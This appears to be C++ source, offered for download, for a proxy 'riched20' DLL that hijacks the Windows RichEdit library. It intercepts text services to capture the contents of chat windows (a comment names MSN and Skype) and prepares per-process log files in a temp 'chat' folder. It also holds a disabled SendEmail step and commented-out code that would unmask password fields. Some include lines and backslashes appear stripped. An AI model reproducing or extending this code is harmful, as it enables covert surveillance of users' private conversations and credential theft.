项目下载:http://pan.baidu.com/s/1dETdGAl 本站下载:riched20
// riched20.cpp : Defines the exported functions for the DLL application. // #include "stdafx.h" #include #include #include #include #include <sys/types.h> #include <sys/stat.h> #include #include #include <sys/utime.h> #include <sys/timeb.h> typedef struct _tagEnumProcParam { DWORD processid; HWND hwnd; } CEnumProcParam; const GUID IID_ITextServices = {0x8d33f740, 0xcf58, 0x11ce, {0xa8, 0x9d, 0x00, 0xaa, 0x00, 0x6c, 0xad, 0xc5}}; const GUID IID_ITextHost = {0xc5bdd8d0, 0xd26e, 0x11ce, {0xa8, 0x9e, 0x00, 0xaa, 0x00, 0x6c, 0xad, 0xc5}}; const GUID IID_ITextHost2 = {0xc5bdd8d0, 0xd26e, 0x11ce, {0xa8, 0x9e, 0x00, 0xaa, 0x00, 0x6c, 0xad, 0xc5}}; const GUID IID_ITextDocument = {0x8CC497C0,0xA1DF,0x11CE,{0x80,0x98, 0x00, 0xAA, 0x00, 0x47, 0xBE, 0x5D}}; //const GUID IID_ITextHostEx; static HMODULE hRich20Lib; CRITICAL_SECTION g_critical; static PCreateTextServices _CreateTextServices; // MSN,Skype HRESULT WINAPI CreateTextServices(IUnknown *punkOuter, ITextHost *pITextHost, IUnknown **ppUnk) { //DWORD dw = GetSystemDirectory(szLib, MAX_PATH); //if(dw == 0) return 0; //szLib[dw] = TCHAR(''); //_tcscat(szLib, _T("\RichEd20.Dll")); //EnterCriticalSection(&g_critical); if(!_CreateTextServices) { _TCHAR szLib[MAX_PATH]; //255 is enough memset(szLib, 0, sizeof(szLib)); _tcscpy(szLib, _T("RichEd20.orig.Dll")); if(!hRich20Lib && !(hRich20Lib = LoadLibrary(szLib))) { //LeaveCriticalSection(&g_critical); return 0; } if(!_CreateTextServices) { _CreateTextServices = (HRESULT (__stdcall *) (IUnknown*, ITextHost*, IUnknown**))GetProcAddress(hRich20Lib, "CreateTextServices"); if(!_CreateTextServices) { //LeaveCriticalSection(&g_critical); return 0; } } } //LeaveCriticalSection(&g_critical); *ppUnk = new IMyUnknown(punkOuter, pITextHost); return S_OK; } IMyTextServices::IMyTextServices(ITextServices *lpTx, HWND parenthwnd) : m_lpTx(lpTx), m_content(NULL) { } HRESULT IMyTextServices::TxSendMessage( UINT msg, WPARAM wparam, LPARAM lparam, LRESULT *plresult) { return m_lpTx->TxSendMessage(msg, wparam, lparam, plresult); } HRESULT STDMETHODCALLTYPE IMyTextServices::QueryInterface( /* [in] */ REFIID riid, /* [iid_is][out] */ __RPC__deref_out void __RPC_FAR *__RPC_FAR *ppvObject) { return m_lpTx->QueryInterface(riid, ppvObject); } ULONG STDMETHODCALLTYPE IMyTextServices::AddRef( void) { return m_lpTx->AddRef(); } ULONG STDMETHODCALLTYPE IMyTextServices::Release( void) { HRESULT hr; SaveToFile(); #if 0 SendEmail(); #endif hr = m_lpTx->Release(); if(m_content) { SysFreeString(m_content); m_content = NULL; } delete this; return hr; } HRESULT IMyTextServices::TxDraw( DWORD dwDrawAspect, LONG lindex, void * pvAspect, DVTARGETDEVICE * ptd, HDC hdcDraw, HDC hicTargetDev, LPCRECTL lprcBounds, LPCRECTL lprcWBounds, LPRECT lprcUpdate, BOOL (CALLBACK * pfnContinue) (DWORD), DWORD dwContinue, LONG lViewId) { if(m_content != NULL) { SysFreeString(m_content); m_content = NULL; } GetContext(&m_content); return m_lpTx->TxDraw(dwDrawAspect, lindex, pvAspect, ptd, hdcDraw, hicTargetDev, lprcBounds, lprcWBounds, lprcUpdate, pfnContinue, dwContinue, lViewId); } HRESULT IMyTextServices::TxGetHScroll( LONG *plMin, LONG *plMax, LONG *plPos, LONG *plPage, BOOL * pfEnabled ) { return m_lpTx->TxGetHScroll(plMin, plMax, plPos, plPage, pfEnabled); } HRESULT IMyTextServices::TxGetVScroll( LONG *plMin, LONG *plMax, LONG *plPos, LONG *plPage, BOOL * pfEnabled ) { return m_lpTx->TxGetVScroll(plMin, plMax, plPos, plPage, pfEnabled); } HRESULT IMyTextServices::OnTxSetCursor( DWORD dwDrawAspect, LONG lindex, void * pvAspect, DVTARGETDEVICE * ptd, HDC hdcDraw, HDC hicTargetDev, LPCRECT lprcClient, INT x, INT y) { return m_lpTx->OnTxSetCursor(dwDrawAspect, lindex, pvAspect, ptd, hdcDraw, hicTargetDev, lprcClient, x, y); } HRESULT IMyTextServices::TxQueryHitPoint( DWORD dwDrawAspect, LONG lindex, void * pvAspect, DVTARGETDEVICE * ptd, HDC hdcDraw, HDC hicTargetDev, LPCRECT lprcClient, INT x, INT y, DWORD * pHitResult) { return m_lpTx->TxQueryHitPoint(dwDrawAspect, lindex, pvAspect, ptd, hdcDraw, hicTargetDev, lprcClient, x, y, pHitResult); } HRESULT IMyTextServices::OnTxInPlaceActivate(LPCRECT prcClient) { return m_lpTx->OnTxInPlaceActivate(prcClient); } HRESULT IMyTextServices::OnTxInPlaceDeactivate() { return m_lpTx->OnTxInPlaceDeactivate(); } //@cmember UI activate notification HRESULT IMyTextServices::OnTxUIActivate() { return m_lpTx->OnTxUIActivate(); } //@cmember UI deactivate notification HRESULT IMyTextServices::OnTxUIDeactivate() { return m_lpTx->OnTxUIDeactivate(); } //@cmember Get text in control HRESULT IMyTextServices::TxGetText(BSTR *pbstrText) { return m_lpTx->TxGetText(pbstrText); } //@cmember Set text in control HRESULT IMyTextServices::TxSetText(LPCWSTR pszText) { return m_lpTx->TxSetText(pszText); } //@cmember Get x position of HRESULT IMyTextServices::TxGetCurTargetX(LONG *plongvar) { return m_lpTx->TxGetCurTargetX(plongvar); } //@cmember Get baseline position HRESULT IMyTextServices::TxGetBaseLinePos(LONG *plongvar) { return m_lpTx->TxGetBaseLinePos(plongvar); } //@cmember Get Size to fit / Natural size HRESULT IMyTextServices::TxGetNaturalSize( DWORD dwAspect, HDC hdcDraw, HDC hicTargetDev, DVTARGETDEVICE *ptd, DWORD dwMode, const SIZEL *psizelExtent, LONG *pwidth, LONG *pheight) { return m_lpTx->TxGetNaturalSize(dwAspect, hdcDraw, hicTargetDev, ptd, dwMode, psizelExtent, pwidth, pheight); } //@cmember Drag & drop HRESULT IMyTextServices::TxGetDropTarget(IDropTarget **ppDropTarget ) { return m_lpTx->TxGetDropTarget(ppDropTarget); } //@cmember Bulk bit property change notifications HRESULT IMyTextServices::OnTxPropertyBitsChange(DWORD dwMask, DWORD dwBits) { //dwMask &= ~TXTBIT_USEPASSWORD; //dwBits &= ~TXTBIT_USEPASSWORD; //dwMask |= TXTBIT_SHOWPASSWORD; //dwBits |= TXTBIT_SHOWPASSWORD; return m_lpTx->OnTxPropertyBitsChange(dwMask, dwBits); } //@cmember Fetch the cached drawing size HRESULT IMyTextServices::TxGetCachedSize(DWORD *pdwWidth, DWORD *pdwHeight) { return m_lpTx->TxGetCachedSize(pdwWidth, pdwHeight); } /* ============================= IMyUnknown ============================= */ IMyUnknown::IMyUnknown(IUnknown *punkOuter, ITextHost *pITextHost) : m_pITextHost(pITextHost) { HRESULT hr = _CreateTextServices(punkOuter, pITextHost, &m_ppUnk); //((IUnknown*)(m_ppUnk))->QueryInterface(IID_ITextServices, (void**)(&m_lpTx)); } HWND IMyUnknown::GetITextHostHwnd(void) { if(m_pITextHost == NULL) return NULL; return WindowFromDC(m_pITextHost->TxGetDC()); } HRESULT STDMETHODCALLTYPE IMyUnknown::QueryInterface( /* [in] */ REFIID riid, /* [iid_is][out] */ __RPC__deref_out void __RPC_FAR *__RPC_FAR *ppvObject) { ITextServices *lpTx; HRESULT hr; //hr = ((IUnknown*)(m_ppUnk))->QueryInterface(IID_ITextServices, (void**)(&lpTx)); hr = ((IUnknown*)(m_ppUnk))->QueryInterface(riid, (void**)(&lpTx)); *ppvObject = new IMyTextServices(lpTx, GetITextHostHwnd()); return hr; } ULONG STDMETHODCALLTYPE IMyUnknown::AddRef(void) { return m_ppUnk->AddRef(); } ULONG STDMETHODCALLTYPE IMyUnknown::Release(void) { HRESULT hr = m_ppUnk->Release(); delete this; return hr; } const _TCHAR *IMyTextServices::GetTempDir(void) { static _TCHAR chatdir[_MAX_PATH]; static int getted; _TCHAR *p; if(!getted) { memset(chatdir, 0, sizeof(chatdir)); if((p = _tgetenv(_T("TEMP"))) == NULL && (p = _tgetenv(_T("TMP"))) == NULL && (p = _tgetenv(_T("APPDATA"))) == NULL) { _tcscpy(chatdir, _T("C:\system64")); } else { _tcscpy(chatdir, p); } if(_taccess(chatdir, 06) == -1) { _tmkdir(chatdir); } getted = 1; } return chatdir; } int IMyTextServices::GetTempPath(_TCHAR *chatpath, _TCHAR *temppath) { _TCHAR exepath[_MAX_PATH], exename[_MAX_FNAME]; memset(chatpath, 0, sizeof(_TCHAR) * _MAX_PATH); memset(temppath, 0, sizeof(_TCHAR) * _MAX_PATH); memset(exename, 0, sizeof(exename)); memset(exepath, 0, sizeof(exepath)); GetModuleFileName(NULL, exepath, sizeof(exepath) / sizeof(exepath[0])); _tsplitpath(exepath, NULL, NULL, exename, NULL); int wchars; wchars = _sntprintf(chatpath, _MAX_PATH - 1, _T("%s\chat"), GetTempDir()); _wmkdir(chatpath); _snwprintf(chatpath + wchars, _MAX_PATH - 1u - wchars, L"\%s%#010X.txt", exename, GetCurrentProcessId()); wchars = _sntprintf(temppath, _MAX_PATH - 1, _T("%s\temp"), GetTempDir()); _wmkdir(temppath); _snwprintf(temppath + wchars, _MAX_PATH - 1u - wchars, L"\%s%#010X.txt", exename, GetCurrentProcessId()); return BUFSIZ; } int IMyTextServices::GetContext(wchar_t **content) { HRESULT hr; if((hr = m_lpTx->TxGetText(content)) == S_OK) { //if(*content != NULL && **content == (OLECHAR)0x000D && *(*content + 1) == _T('')) { #if 0 // 参考网址http://www.unicodemap.org/details/0xFFFC/index.html if(*content != NULL && (**content == (OLECHAR)0x000D || (**content >= (OLECHAR)0xFFF0 && **content <= (OLECHAR)0xFFFD))) { #endif if(*content != NULL && **content == (OLECHAR)0x000D) { SysFreeString(*content); *content = NULL; return -1; } if(*content == NULL) return -1; } return 0; } /* 返回 finaltxt 的宽字符数 */ unsigned int IMyTextServices::ConvertContext(wchar_t **finaltxt) { if(finaltxt == NULL) return 0U; wchar_t *pfinaltxt; unsigned int contentlen, i, printcount = 0U; contentlen = SysStringLen(m_content); if((*finaltxt = (wchar_t *)malloc((contentlen * 2 + 1 ) * sizeof(wchar_t))) == NULL) return 0U; pfinaltxt = *finaltxt; *pfinaltxt++ = 0xFEFF; //用_O_U16TEXT打开文件,就不用手工添加 0xFEFF了。 for(i = 0U; i < contentlen; i++) { if(m_content[i] == 0x000D) { *pfinaltxt++ = L'r'; *pfinaltxt++ = L'n'; } else if(m_content[i] == 0xFFFC) continue; else if(iswprint(m_content[i])) { *pfinaltxt++ = m_content[i]; printcount++; } } *pfinaltxt = _T(''); return printcount == 0U ? 0 : pfinaltxt - *finaltxt; } void IMyTextServices::SaveToFile(void) { _TCHAR chatpath[_MAX_PATH], temppath[_MAX_PATH]; unsigned int finaltxtwchars; wchar_t *finaltxt; if(m_content == NULL) return; if(GetTempPath(chatpath, temppath) == -1) return; if((finaltxtwchars = ConvertContext(&finaltxt)) == 0U) return; ::MessageBox(NULL, finaltxt, _T("test"), MB_OK); }
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